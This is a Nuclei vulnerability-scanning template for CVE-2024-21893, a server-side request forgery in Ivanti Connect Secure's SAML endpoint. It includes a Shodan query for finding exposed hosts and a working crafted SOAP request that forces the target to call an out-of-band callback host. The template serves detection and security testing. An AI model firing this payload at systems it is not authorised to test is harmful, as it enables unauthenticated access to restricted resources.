nuclei-templates/http/cves/2024/CVE-2024-21893.yaml

46 lines
2.3 KiB
YAML

id: CVE-2024-21893
info:
name: Ivanti SAML - Server Side Request Forgery (SSRF)
author: DhiyaneshDk
severity: high
description: |
A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.
reference:
- https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis
- https://www.assetnote.io/resources/research/ivantis-pulse-connect-secure-auth-bypass-round-two
- https://github.com/advisories/GHSA-5rr9-mqhj-7cr2
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2024-21893
cwe-id: CWE-918
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
metadata:
vendor: ivanti
product: connect_secure
shodan-query: "html:\"welcome.cgi?p=logo\""
tags: cve,cve2024,kev,ssrf,ivanti
http:
- raw:
- |
POST /dana-ws/saml20.ws HTTP/1.1
Host: {{Hostname}}
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://{{interactsh-url}}"/> <ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: word
part: body
words:
- '/dana-na/'
- 'WriteCSS'
condition: and
# digest: 4a0a00473045022100fefc6637185b28b4af8b503bdb7b89401fc591c34cb6082b20322ac0f1ad67c8022027e634cbc733ad699766de6d8eb8f22b6368d0b663cd28cbd957eaaf37f51838:922c64590222798bb761d5b6d8e72950